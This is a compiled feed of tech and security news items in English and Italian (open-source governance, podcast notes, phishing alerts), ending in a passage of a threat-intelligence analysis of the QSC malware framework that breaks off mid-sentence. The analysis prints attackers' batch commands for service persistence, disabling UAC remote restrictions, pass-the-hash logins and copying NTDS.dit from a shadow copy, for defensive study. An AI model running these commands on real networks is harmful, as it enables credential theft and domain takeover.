The chances are if you know someone who is a former Apple employee, you’ll have heard their Steve Jobs anecdote, and that it was rather unflattering to the Apple co-founder. I’ve certainly heard a few myself, and quick web search will reveal plenty more. There are enough of them that it’s very easy to conclude the guy was not a very pleasant person at all.

At the same time, he was a person whose public persona transcended reality, and his fan base treated him with an almost Messianic awe. For them everything he touched turned to gold, every new feature on an Apple product was his personal invention, every one of his actions even the not-so-clever ones were evidence of his genius, and anyone who hadn’t drunk the Apple Kool-Aid was anathema. You’ll still see echoes of this today in Apple fanboys, even though the shine on the company is perhaps now a little tarnished.

It’s easy to spot parallels to this story in some of today’s tech moguls who have gathered similar devotion, but it’s a phenomenon by no means limited to tech founders. Anywhere there is an organisation or group that is centred around an individual, from the smallest organisation upwards, it’s possible for it to enter an almost cult-like state in which the leader both accumulates too much power, and loses track of some of the responsibilities which go with it. If it’s a tech company or a bowls club we can shrug our shoulders and move to something else, but when it occurs in an open source project and a benevolent dictator figure goes rogue it has landed directly on our own doorstep as the open-source community. It’s happened several times that I can immediately think of and there are doubtless more cases I am unaware of, and every time I am left feeling that our community lacks an adequate mechanism to come through it unscathed.

In theory, the advantage of open-source software is that it provides choice. If something offends you about a project you can switch to an alternative, or if you are a software developer you can simply fork it or write your own competitor. Both of those points you’ll still see trotted out by open source developers when they face criticism, yet both of them are increasingly fantastical. The scale of many large pieces of software means that there is an inevitable progression towards a single dominant project, and the days when all users of open source software were capable of writing it are long gone if they ever existed at all. In many cases the reality of large open source projects is one of lock-in just as much as in the proprietary world; if you’ve put a lot of effort into adopting something then you’re along for the ride as the cost of changing your path are too significant to ignore.

So how can we as the open source community deal with a rogue emperor in a project we rely on? In some cases the momentum can eventually gather enough to generate an alternative path, you will probably come up with the same examples I’m thinking of as I write this. But all too often either a loyal Praetorian Guard of developers protect their leader, or a firm grip on the non-open-source IP surrounding the ecosystem keeps the problematic figure in place despite all attempts to move forward. Perhaps it’s time not to consider the problem after it happens, but before.

A central plank of the open source community lies in the licence. It sets down the framework under which the software can be used and shared, and there are a huge number of choices to reflect the varying ideals of software developers. It’s a great system in what it sets out to do, but I feel there’s an aspect of open source software it fails to address. Perhaps as well as considering how the IP is regulated, a licence should also commit the project to a system of governance, much in the manner that a country will have a constitution. If this constitution is written to maintain good governance and combat the threat of a rogue emperor it could only make for more stability, and since any code contributions would be made under its terms it would be very difficult for someone intent on breaking that governance structure to remove.

One thing is for sure, it’s becoming wearisome to find afresh every few months that a piece of software you use every day is associated with problematic people or behaviours. Something needs to be done, even if it’s not quite my suggestion here. What do you think? Tell us in the comments.

hackaday.com/2024/11/08/the-ro…

With Superconference 2024 in the books, Dan joined Elliot, fresh off his flight back from Pasadena, to look through the week (or two) in hacks. It was a pretty good crop, too, despite all the distractions and diversions. We checked out the cutest little quadruped, a wireless antenna for wireless communications, a price-tag stand-in for paper calendars, and a neat way to test hardware and software together.

We take the closest look yet at why Arecibo collapsed, talk about Voyager’s recent channel-switching glitch, and find out how to put old Android phones back in action. There’s smear-free solder paste application, a Mims-worthy lap counter, and a PCB engraver that you’ve just got to see. We wrap things up with a look at Gentoo and pay homage to the TV tubes of years gone by — the ones in the camera, for the TV sets.

html5-player.libsyn.com/embed/…
Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Download the zero-calorie MP3.

Episode 295 Show Notes:

News:

• Voyager 1 Fault Forces Switch To S-Band

What’s that Sound?

• Fill in this form for your chance to win. Be specific!

Interesting Hacks of the Week:

• Rapid Prototyping PCBs With The Circuit Graver
• Zinc Creep And Electroplasticity: Why Arecibo Collapsed
• Little Quadruped Has PCB Spine And No Wiring
• Hardware-in-the-Loop Continuous Integration
• Reusing An Old Android Phone For GPIO With External USB Devices
• Portable Solder Paste Station Prevents Smears With Suction

Quick Hacks:

• Elliot’s Picks
  
  • Random Wire Antenna Uses No Wire
  • PicoROM, A DIP-32 8-Bit ROM Emulator
  • Split-Flap Clock Flutters Its Way To Displaying Time Without Numbers

  
  

• Dan’s Picks:
  
  • Word Of The Day Calendar Is Great Use Of E-Paper
  • Use PicoGlitcher For Voltage Glitching Attacks
  • Clever Circuit Makes Exercise Slightly Less Boring

  
  

Can’t-Miss Articles:

• I Installed Gentoo So You Don’t Havtoo
  
  • Handbook:Main Page – Gentoo wiki

  
  

• Capturing Light In A Vacuum: The Magic Of Tube Video Cameras

hackaday.com/2024/11/08/hackad…

[TenTech]’s Fuzzyficator brings fuzzy skin — a textured finish normally limited to sides of 3D prints — to the top layer with the help of some non-planar printing, no hardware modifications required. You can watch it in action in the video below, which also includes details on how to integrate this functionality into your favorite slicer software.
Little z-axis hops while laying down the top layer creates a fuzzy skin texture.
Fuzzyficator essentially works by moving the print nozzle up and down while laying down a top layer, resulting in a textured finish that does a decent job of matching the fuzzy skin texture one can put on sides of a print. Instead of making small lateral movements while printing outside perimeters, the nozzle does little z-axis hops while printing the top.

Handily, Fuzzyficator works by being called as a post-processing script by the slicer (at this writing, PrusaSlicer, Orca Slicer, and Bambu Studio are tested) which also very conveniently reads the current slicer settings for fuzzy skin, in order to match them.

Non-planar 3D printing opens new doors but we haven’t seen it work like this before. There are a variety of ways to experiment with non-planar printing for those who like to tinker with their printers. But there’s work to be done that doesn’t involve hardware, too. Non-planar printing also requires new ways of thinking about slicing.

youtube.com/embed/85FJl5P0AoU?…

hackaday.com/2024/11/08/fuzzy-…

Un’ombra inquietante si aggira nei sistemi aziendali: la campagna di attacco VEILDrive sta violando l’infrastruttura cloud di Microsoft, sfruttando i suoi stessi servizi legittimi per sfuggire a qualsiasi tentativo di rilevamento. Microsoft Teams, SharePoint, Quick Assist e persino OneDrive sono finiti nelle mani dei cybercriminali, trasformati in potenti strumenti per diffondere malware senza destare sospetti.

L’azienda di cybersecurity israeliana Hunters, che ha scoperto l’operazione a settembre 2024, ha lanciato l’allarme: VEILDrive rappresenta una minaccia strategica per infrastrutture critiche, come dimostrato dall’attacco che ha colpito una grande organizzazione americana, identificata come “Org C”. Senza svelare il nome dell’azienda vittima, Hunters ha descritto un attacco sofisticato, iniziato già ad agosto, culminato con l’installazione di un malware basato su Java, progettato per connettersi ai server Command and Control dei cybercriminali tramite OneDrive.

L’arma segreta di VEILDrive: Un’infrastruttura fidata

Come può un attacco così sofisticato passare inosservato? La risposta è tanto geniale quanto spaventosa: VEILDrive sfrutta la fiducia che i servizi Microsoft SaaS godono nei sistemi aziendali. Questi attaccanti non hanno creato nuovi strumenti, non hanno installato software non riconosciuti: hanno usato i servizi stessi di Microsoft per stabilire un livello di accesso continuativo, discreto e pericolosamente letale.

In una manovra di inganno senza precedenti, VEILDrive ha inviato messaggi tramite Teams a quattro dipendenti di “Org C”, impersonando membri dell’IT e richiedendo accesso remoto con Quick Assist. Ma la vera genialità dell’attacco sta nell’uso di un account già compromesso di un’altra azienda, “Org A”. Così, invece di generare sospetti con account falsi, hanno usato quello di una vittima precedente per insinuarsi nella nuova rete.

Microsoft Teams come porta d’ingresso per i Cybercriminali

Il tallone d’Achille sfruttato in questo attacco è una funzionalità di Microsoft Teams che consente la comunicazione diretta tra utenti di diverse organizzazioni tramite “Accesso Esterno”. Una funzione apparentemente innocua, ma che ha fornito un varco per i malintenzionati. Usare un servizio aziendale per lanciare un attacco contro un’altra azienda: un meccanismo di compromissione subdolo, che evidenzia come le politiche di fiducia tra piattaforme possano essere un’arma a doppio taglio.

Conclusione

Mentre il silenzio di Microsoft su questo fronte lascia spazio a preoccupazioni sempre più angoscianti, la campagna VEILDrive apre gli occhi su una realtà che non possiamo più ignorare. Nessuna infrastruttura, nessun servizio Cloud, per quanto fidato, può considerarsi immune. La domanda non è più “se” si verrà colpiti, ma “quando” e con quale sofisticazione.

VEILDrive ci lancia un segnale forte e chiaro: l’era della sicurezza garantita è finita. Le aziende devono abbandonare ogni illusione di protezione assoluta e riconoscere che oggi anche i servizi più fidati possono essere usati contro di loro.

L'articolo Microsoft Teams e OneDrive nelle Mani degli Hacker: La Minaccia Invisibile di VEILDrive proviene da il blog della sicurezza informatica.

L’FBI ha lanciato un avvertimento alle aziende statunitensi riguardo a un nuovo sistema di truffatori che utilizzano le richieste di dati di emergenza per rubare informazioni personali.

Utilizzando indirizzi e-mail hackerati di agenzie governative, i truffatori chiedono alle aziende private di fornire urgentemente dati riservati presumibilmente necessari per le indagini. Le aziende, temendo per l’incolumità delle persone, spesso forniscono i dati senza controllare attentamente le richieste. Di conseguenza, i criminali ottengono l’accesso alle informazioni personali degli utenti: telefoni, indirizzi ed e-mail, che vengono poi utilizzati per estorsioni o phishing.

Secondo l’FBI, negli ultimi mesi si è registrato un aumento delle vendite di conti governativi compromessi sui forum underground. Ad esempio, nell’agosto del 2024, un criminale informatico ha messo in vendita l’accesso agli indirizzi .gov a scopo di spionaggio ed estorsione. Il venditore ha affermato di essere in grado di aiutare i clienti a inviare richieste di dati di emergenza e ha anche fornito documenti falsi per mascherarsi da agenti delle forze dell’ordine.

Tali casi non sono isolati. Nel marzo 2024, un altro criminale ha affermato di avere accesso alle e-mail governative di più di 25 paesi e di essere disposto a fornire assistenza per richiedere dati, inclusi indirizzi e-mail e numeri di telefono. Nel dicembre 2023 sono stati registrati tentativi di ottenere dati attraverso false richieste con minacce che la mancata osservanza avrebbe potuto portare addirittura alla morte.

Per migliorare la protezione aziendale, l’FBI raccomanda di valutare criticamente tutte le richieste di dati di emergenza ricevute esaminando i documenti per individuare falsificazioni e incoerenze nei codici legali. È anche importante verificare accuratamente il mittente al minimo sospetto.

Le misure proposte per migliorare la sicurezza includono:

• utilizzo dell’autenticazione a due fattori;
• implementare rigide politiche di gestione delle password;
• creazione di password di almeno 16 caratteri di lunghezza e con combinazioni complesse di lettere, numeri e caratteri speciali;
• limitare l’accesso alle reti aziendali;
• impostare la segmentazione della rete per prevenire la diffusione di malware;
• utilizzando strumenti per monitorare attività sospette.

A causa dell’aumento della minaccia, l’FBI consiglia vivamente alle organizzazioni di rivedere i propri piani di risposta agli incidenti e di aggiornare le proprie politiche di sicurezza.

È inoltre importante mantenere stretti contatti con gli uffici regionali dell’FBI per il rapido scambio di informazioni e il coordinamento delle azioni. Per segnalare incidenti sospetti e attività criminali, l’FBI consiglia di segnalare tramite ic3.gov o l’ufficio sul campo più vicino.

L'articolo Phishing Estremo: i Cyber Criminali Sfruttano Email Governative Per Richiedere Dati Personali proviene da il blog della sicurezza informatica.

Steve Ballmer famously called Linux “viral”, with some not-entirely coherent complaints about the OS. In a hilarious instance of life imitating art, Windows machines are now getting attacked through malicious Linux VM images distributed through phishing emails.

This approach seems to be intended to fool any anti-malware software that may be running. The VM includes the chisel tool, described as “a fast TCP/UDP tunnel, transported over HTTP, secured via SSH”. Now that’s an interesting protocol stack. It’s an obvious advantage for an attacker to have a Linux VM right on a target network. As this sort of virtualization does require hardware virtualization, it might be worth disabling the virtualization extensions in BIOS if they aren’t needed on a particular machine.

AI Finds Real CVE

We’ve talked about some rather unfortunate use of AI, where aspiring security researchers asked an LLM to find vulnerabilities in a project like curl, and then completely wasted a maintainer’s time on those bogus reports. We happened to interview Daniel Stenberg on FLOSS Weekly this week, and after he recounted this story, we mused that there might be a real opportunity to use LLMs to find vulnerabilities, when used as a way to direct fuzzing, and when combined with a good test suite.

And now, we have Google Project Zero bringing news of their Big Sleep LLM project finding a real-world vulnerability in SQLite. This tool was previously called Project Naptime, and while it’s not strictly a fuzzer, it does share some similarities. The main one being that both tools take their educated guesses and run that data through the real program code, to positively verify that there is a problem. With this proof of concept demonstrated, it’s sure to be replicated. It seems inevitable that someone will next try to get an LLM to not only find the vulnerability, but also find an appropriate fix.

Slipping Between Parsers

Something else interesting from our conversation with Daniel was the trurl tool, that makes the curl url parser available as a standalone tool. The point being that there are often security problems that arise from handling URLs and other user-provided data with different parsers. And that’s the story [Andrea Menin] has to tell, taking a look at how file parsers handle file uploads a bit differently.

More specifically, Web Application Firewalls (WAFs) check a handful of metrics on file uploads, like the file extension, MIME Type, the “magic” first few bytes of the file, file size, filename sanitization, and more. This gets complicated when an application uses multipart/form-data. Files and parameters get chunked, separated by boundary delimiter strings.

So one trick is to hide strings that the WAF would normally block, by sneaking them inside a multipart upload. Another trick is to use the same name field multiple times. The WAF may ignore the repeated names, and the application itself may not ignore the repetition in the same way. There are many more, from inconsistent quotes, to omitting an expected carriage return in the upload, to failing to mention that your filename contains UTF characters.

Backscatter TOR DoS

[delroth] got a nasty surprise. He got an abuse@ email, letting him know that one of his server VMs was sending SSH probes around the Internet. Unless you’re SSH scanning on purpose, that’s not a good surprise. That’s bad for two reasons. First off, it really implies that your server has been compromised. And second, it’s going to put your IP on multiple spam and abuse blacklists.

The natural response was to start looking for malware. The likely culprits were a Syncthing relay, a Mastodon instance, a Tor relay, and a Matrix server. The odd thing was that none of those services showed signs of compromise. The breakthrough came when [delroth] started looking close at port 22 traffic captured by a running tcpdump. No outgoing packets were getting captured, but TCP reset packets were coming in.

And really, that’s the whole trick: Send bogus SSH packets from a spoofed IP address, to a bunch of servers around the Internet, and some of them will generate complaints. Anyone can generate raw packets with spoofed IP addresses. The catch is that not everyone can successfully send that traffic, since many ISPs do BCP38 scrubbing, where “impossible” traffic gets dropped. This traffic was impossible, since those source IPs were coming from the wrong network.

The only real question is “why?” The answer seems to be TOR. While [delroth] does run a TOR node, it’s not an exit node, which is usually enough to keep the IP out of trouble. While TOR does make some guarantees about traffic anonymity, it doesn’t make any guarantees about hiding the IPs of network nodes. And it seems that it’s recently become someone’s hobby to trigger exactly these attacks on TOR nodes.

Bits and Bytes

A pair of developers have started working on hardening for the PHP language and server components. That means adding back safe-unlink, doing memory isolation to make heap spraying harder, and removing trivial ways to trivially get powerful primitives. PHP may not be the cool kid on the block any more, but it’s still very widely used, and making exploitation just a bit harder is a clear win.

Cisco’s Unified Industrial Wireless Software had a trivial command injection attack allowing for arbitrary command execution as root. This was limited to devices running with Ultra-Reliable Wireless Backhaul mode turned on. So far this flaw hasn’t been found in real attacks, but such a flaw in industrial equipment isn’t great.

And finally, Electronic Arts had an improperly secured web API endpoint, and [Sean Kahler] found it and started looking around. It turns out that API included a swagger json, which documents the entire API. Score! In the end, the API allowed for moving a “persona” from one account to another, and that eventually allows for full account takeover. Yikes.

hackaday.com/2024/11/08/this-w…

ENISA ha avviato la consultazione pubblica della sua guida pratica per la cyber sicurezza delle organizzazioni europee secondo la direttiva NIS2. Un documento importante su cui le stesse organizzazioni potranno implementare il loro piano di conformità normativa. Ecco i punti cardine

L'articolo NIS2, le linee guida ENISA per l’implementazione in azienda: i punti essenziali proviene da Cyber Security 360.

Più un'organizzazione è trasparente, nei processi come nella cultura, e più le probabilità che sia rigorosa nei suoi processi produttivi aumentano. La trasparenza è un elemento fondamentale, poiché contribuisce a creare fiducia tra produttori, clienti e partner. E questo è ancora più vero in relazione alla cyber security

L'articolo La fiducia nella cyber security passa dalla trasparenza: il ruolo dei fornitori proviene da Cyber Security 360.

I settori più critici dal punto di vista degli attacchi nel 2023 si sono registrati in ambito finanziario/assicurativo e manifatturiero. Ma anche la sanità è sempre più bersagliata, con attacchi in crescita di oltre l'80% in Italia. Come prepararsi al futuro, dopo l’entrata in vigore di DORA e delle altre normative

L'articolo Rapporto Clusit 2024, cyber attacchi in Italia: manifatturiero e sanità i settori più colpiti proviene da Cyber Security 360.

Il Regolamento DORA rappresenta un passo significativo verso il rafforzamento della resilienza operativa nel settore finanziario. In questo senso, l’AI generativa emerge come un potente alleato in questo processo, offrendo strumenti e soluzioni innovative per affrontare le sfide poste dalla resilienza digitale

L'articolo Rafforzare la resilienza digitale: l’AI generativa al servizio del regolamento DORA proviene da Cyber Security 360.

Eletto il 47° presidente degli Stati Uniti d’America: torna Donald Trump a governare una delle maggiori potenze del mondo, ma dal punto di vista della sicurezza e dell’informazione come siamo arrivati all’Election Day? Cosa sappiamo e la posizione della Cina nella campagna di disinformazione

L'articolo Tra fake news e intercettazioni telefoniche: l’ombra della Cina sulle elezioni USA proviene da Cyber Security 360.

L’European Data Protection Board ha pubblicato il primo rapporto di revisione sul Data Privacy Framework (DPF): secondo l’EDPB, le misure implementate dal DPF, sebbene migliorative, lasciano aperte questioni rilevanti sulla reale equivalenza delle garanzie offerte rispetto a quelle europee. Ecco quali

L'articolo I dubbi dell’EDPB sul Data Privacy Framework: ancora tante le questioni aperte proviene da Cyber Security 360.

I vip si ritrovano sempre più spesso inconsapevolmente volani di truffe. La loro immagine viene sfruttata per irretire gli utenti e Meta cerca di calare l’asso con il riconoscimento facciale. L’idea può essere buona, ma non è esente da limiti

L'articolo Meta e il riconoscimento facciale dei vip per contrastare le truffe proviene da Cyber Security 360.

Il Garante privacy ha assegnato 20 giorni ad Intesa San Paolo per informare i clienti che hanno subito il data breach per l’acceso indebito di un proprio dipendente. La banca minimizza, ma dietro c'è un problema enorme, ecco perché

L'articolo “Intesa San Paolo avvisi subito i correntisti spiati”, che ci insegna la mossa del Garante Privacy proviene da Cyber Security 360.

È stata identificata una sofisticata campagna di phishing in cui i truffatori sfruttano la fiducia riposta nella legittimità del servizio di firma elettronica DocuSign per aggirare i filtri antispam e ingannare le vittime con l’obiettivo di ottenere pagamenti fraudolenti. Ecco tutti i dettagli e come difendersi

L'articolo False fatture di phishing: così i criminali sfruttano la firma elettronica di DocuSign proviene da Cyber Security 360.

L'obiettivo principale di ToxicPanda è quello di avviare trasferimenti di denaro da dispositivi Android compromessi tramite l'acquisizione di account (ATO) sfruttando la tecnica dellafrode sul dispositivo (ODF). Ecco come mitigare il rischio

L'articolo ToxicPanda truffa gli utenti Android con trasferimenti di denaro fraudolenti: come proteggersi proviene da Cyber Security 360.

On the bench where this is being written, there’s a Mitutoyo vernier caliper. It’s the base model with a proper vernier scale, but it’s beautifully made, and it’s enjoyable to see younger hardware hackers puzzle over how to use it. It cost about thirty British pounds a few years ago, but when it comes to quality metrology instruments that’s really cheap. The sky really is the limit for those in search of ultimate accuracy and precision. We can see then why this Redditor was upset when the $400 Mitutoyo they ordered from Amazon turned out to be nothing of the sort. We can’t even call it a fake, it’s just a very cheap instrument stuffed oddly, into a genuine Mitutoyo box.

Naturally we hope they received a refund, but it does raise the question when buying from large online retailers; how much are we prepared to risk? We buy plenty of stuff from AliExpress in out community, but in that case the slight element of chance which comes with random Chinese manufacture is offset by the low prices. Meanwhile the likes of Amazon have worked hard to establish themselves as trusted brands, but is that misplaced? They are after all simply clearing houses for third party products, and evidently have little care for what’s in the box. The £30 base model caliper mentioned above is an acceptable punt, but at what point should we go to a specialist and pay more for some confidence in the product?

It’s a question worth pondering as we hit the “Buy now” button without thinking. What’s your view? Let us know in the comments. Meanwhile, we can all be caught with our online purchases.

Thanks [JohnU] for the tip.

hackaday.com/2024/11/08/ask-ha…

Will Virkkunen finally put to rest the network fees ideas to focus on what really matters for the Internet ecosystem and EU citizens? Information Labs’ research certainly points in that direction.

euractiv.com/section/digital/o…

Introduction

In 2021, we began to investigate an attack on the telecom industry in South Asia. During the investigation, we discovered QSC: a multi-plugin malware framework that loads and runs plugins (modules) in memory. The framework includes a Loader, a Core module, a Network module, a Command Shell module and a File Manager module. It is dropped either as a standalone executable or as a payload file along with a loader DLL. In this post, we describe each component of the framework as well as its recent activity including a deployment scenario, an additional backdoor, post-compromise activity and a link to the CloudComputating group.

QSC framework components

The Loader

The Loader implant is a service DLL with the internal name
loader.dll. It contains the string “E:\project\test\qt\bin\module\loader\x64\release\loader.pdb” as its PDB path. The Loader is configured to either read code from <systemdir>\drivers\msnet or read 0x100 (256) bytes from n_600s.sys, located in the same directory as the module, to get the file path containing code. If it reads the file path from n_600s.sys, it deletes the file afterwards. The Loader then reads and decompresses code from the provided file path. It reflectively injects the decompressed code into memory and calls the exported method plugin_working. The code injected by the Loader is the Core module, which is described below.

The Core and Network modules

The Core module has an internal name,
qscmdll.dll, and exports only one method, named plugin_working. It contains the string “E:\project\test\qt\bin\module\qscmdll\x64\release\qscmdll.pdb” as its PDB path. The Loader module passes the file path that contains the compressed Network module code as one of the parameters to the Core module.
The Core module reads the Network module (from the passed file path), decompresses it and injects it into memory. The Network module is a 64-bit DLL with the internal name
qscnetwork.dll. It contains the string “E:\project\test\qt\bin\module\qscnetwork\x64\release\qscnetwork.pdb” as its PDB path. The Network module exports the methods setConfig, checkTarget and getNetWork.
The Core module, after injecting the Network module into memory, initializes it by calling its exported methods in sequence:

• setConfig: copy configuration data from the Core module to the Network module.
• checkTarget: validate configuration fields by checking that the lengths of the fields are within their size limits.
• getNetWork: prepare and get the network object from the Network module for C2 communication. The Network module uses TLS implementation from the MbedTLS library.

In some of the cases, we found that the C2 in the configuration data contained an internal/proxy IP address, which suggested that the attackers were already aware of the target network topology. The configuration file contained the following settings:

• C2 IP address;
• Port;
• Sleep time;
• Internal/Proxy IP address;
• Proxy port;
• Proxy username;
• Proxy password.

The Core module supports the following C2 commands:

The File Manager module

The File Manager module has the internal name
qscBrowse.dll. It contains the string “E:\project\test\qt\bin\module\qscBrowse\x64\release\qscBrowse.pdb” as its PDB path, and exports the following methods.

• destroy: Free objects relating to network connection, file browsing and file transmission.
• destroyTransmit: Free network connection and file transmit operation related objects.
• startBrowse: Browse file system.
• startTransmit: Read/write file from/to system.
• stop: Close network connection. Stop the browsing and transmitting operations.
• stopTransmit: Close network connection and stop file transmitting operations.

The Core module, after reflectively injecting the File Manager module, calls its
startBrowse method. The startTransmit exported method of the File Manager module contains functionality to read/write files from/to the system. It is called when the module executes certain commands. The File Manager module supports following C2 commands:

Command Shell module

The Command Shell module has the internal name
qscShell.dll. It contains the string “E:\project\test\qt\bin\module\qscShell\x64\release\qscShell.pdb” as its PDB path, and exports the methods below.

• destroy: Free network connection and command shell related objects.
• startShell: Spawn cmd.exe as a command shell.
• stop: Close the network connection and terminate the command shell process.

The Core module, after reflectively injecting the Command Shell module, calls its
startShell method. The Command Shell module launches %windir%\system32\cmd.exe as a shell using the CreateProcess API, and data is written to and read from the shell using pipes. If the size of the received data exceeds 0xB (11) bytes, it checks if the received data starts with one of the command strings below. If the data does not start with one of these command strings, it is written to the command shell via a pipe.
If there is no more data to receive, the command shell is closed by issuing an
exit command.

QSC framework and GoClient backdoor deployment

When we first discovered the QSC framework in 2021, we had insufficient telemetry to find out how the framework was deployed or who the threat actor behind it was. We continued to monitor our telemetry for further signs of the QSC framework. In October 2023, we detected multiple instances of QSC files targeting an ISP in West Asia. Our investigation found that the target machines had been infected with the Quarian backdoor version 3 (aka Turian) since 2022, and the same attackers had used this access to deploy the QSC framework starting on October 10, 2023.

In addition to the QSC framework, the attackers also deployed a new backdoor written in Golang, which we have named “GoClient”. We saw the first deployment of this GoClient backdoor on October 17, 2023. After analyzing all the artifacts from this campaign, we assess, with medium confidence, that the CloudComputating threat actor is behind the deployment of the QSC framework and the GoClient backdoor.

QSC framework deployment

In October 2023, our telemetry showed that the Quarian backdoor was used to copy
c:\windows\system32\cmd.exe to c:\windows\task.exe and launch the command shell. The batch script is executed via the command shell.net stop swprv
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\Parameters /v
ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\swprr.dll /f
sc config swprv start= auto
ping -n 120 127.0.0.1
net start swprv
As can be seen above, a service is created to launch the QSC framework loader DLL
swprr.dll.
In the same month, our telemetry indicated that yet another batch script had been executed via the Quarian backdoor, with similar commands:
net stop rasauto
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\Parameters /v
ServiceDll /t REG_EXPAND_SZ /d $system32\rasautosvc.dll /f"
sc config rasauto start= auto
ping -n 120 127.0.0.1
net start rasauto
Just like the previous set of commands, the goal is to create a service to launch the QSC framework loader DLL
rasautosvc.dll.
About a month later, the attacker launched a command shell (
cmd.exe) using the QSC framework loader DLL file C:\Windows\System32\rasautosvc.dll, and dropped the following multiple QSC framework binaries in the specified order:

• C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
• C:\Windows\L2Schemas\update.exe (MD5 7f89a83cda93ed3ddaa4315ea4ebba45)
• C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)
• C:\Windows\L2Schemas\update.exe (MD5 112820e9a87239c2e11ead80759bef85)
• C:\Windows\L2Schemas\update.exe (MD5 d99d97bb78929023d77d080da1b10f42)

Over the course of the next few months, more QSC framework binaries were dropped on the system via the same mechanism.

GoClient backdoor deployment

Also in October 2023, we found that the threat actor dropped and executed the GoClient backdoor file onto the affected system as
c:\programdata\usoshared\intop64.exe, again using the Quarian backdoor infection.

GoClient backdoor

The GoClient backdoor file communicates with the C2, hardcoded in the malware, via TLS. In order to initiate the communication, the malware prepares the challenge key by base64-encoding the hardcoded value of “177a7b1cf2441c7ebf626ebc7e807017” and sending it to the C2 server. If the challenge key is accepted, the C2 server sends a 16-byte value, which will be used as an RC4 key to encrypt/decrypt all subsequent messages between the malware and the server.

Next, the malware collects a list of system information (e.g. hostname, local IP, number of CPUs, etc.) from the victim’s machine in JSON format, encrypts it with an RC4 key, encodes it in base64 and sends it to the server.

The backdoor then receives a base64-encoded and RC4-encrypted, space-delimited list of command strings from the C2 server to execute on the victim’s machine.

The main C2 commands available are listed below:

Post-compromise activity using the GoClient backdoor

As mentioned above, the GoClient backdoor can be used to execute commands on a target system. This functionality was frequently used by the attackers. For example, they dropped the legitimate
rar.exe file in c:\inetpub\temp\ and uploaded a batch script, 1.bat, to the same location. Next, according to our telemetry, they executed 1.bat. The batch script contains the following commands:ping www.google.com -n 2
File Create("c:\inetpub\temp\a.dat");
systeminfo
ipconfig /all
netstat -ano -p tcp
tasklist /svc
net start
net view
arp -a
net localgroup administrators
reg query hkey_users
netsh firewall show config
net group /domain
net group "domain controllers" /domain
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings"
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BITS\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\appmgmt\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\rasauto\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv\parameters
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\swprv\parameters
reg add
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v
LocalAccountTokenFilterPolicy /t REG_DWORD /d 0x1 /f
c:\inetpub\temp\rar.exe a c:\inetpub\temp\s.rar c:\inetpub\temp\*.dat
As can be seen from the list of executed commands, the attackers are primarily interested in collecting system information. Only at the end do they disable UAC remote restrictions and compress the harvested data with the previously uploaded
rar.exe utility.

Post-compromise activity using the QSC framework

The QSC framework was also leveraged to execute a series of commands to find the domain controller on the network, the file server and other machines as shown below. The domain controller was queried to view the list of users within the groups “domain controllers” and “domain computers”:
net group /domain
net group "domain controllers" /domain
ping dc01 -n 1"
ping dc02 -n 1"
net group "domain computers" /domain
ping 172.19.19.1 -n 1
ping 172.19.19.2 -n 1
tracert 172.19.19.2
netstat -ano
ping -a 172.17.104.102 -n 1
netstat -ano
findstr 172.19
ping -n -a fileserver
ping -n 1 -a fileserver
The attackers then dropped a tool to c:\Windows\L2Schemas\we.exe. We could not obtain a copy of
we.exe, but it was used to log in to the domain controller machine using the “pass the hash” technique and execute commands remotely:we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<user_name>@<domain_controller_ip> "whoami"

we.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<domain>/<user_name>@<domain_controller_ip> -dc-ip <domain_controller_ip> "whoami"

wm.exe -hashes aad3b435b51404eeaad3b435b51404ee:621a23dd771b1eb39c954cd6828aee6c
<domain>/<user_name>@<domain_controller_ip> "whoami" -with-output
Next, the actor tried to list the users under the group “domain admins”:
net group "domain admins" /domain
One of the domain admin accounts was used by the attacker to remotely execute various commands on the domain controller and other machines using WMIC. Commands were executed to obtain the network configuration, and a shadow copy of the C: drive and the NTDS database. All information thus collected was then stored at user\downloads\1.txt on the domain controller:
wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "system32\cmd.exe /c ipconfig >>$user\downloads\1.txt"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "vssadmin create shadow /for=C: >> $user\downloads\1.txt"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\NTDS.dit
$user\downloads"

wmic /node:<domain_controller_ip> /user:<user_name> /password:<user_password> process call
create "vssadmin delete shadows /for=c: /quiet"

Lateral movement (deploying the QSC framework)

By using WMIC and the stolen domain admin credentials, the attackers were able to execute the QSC framework on other machines within the affected network. We found multiple instances during our investigation where the attackers used WMIC to remotely run either a QSC framework loader DLL or a QSC framework executable on a target machine.

We found that the QSC framework sample
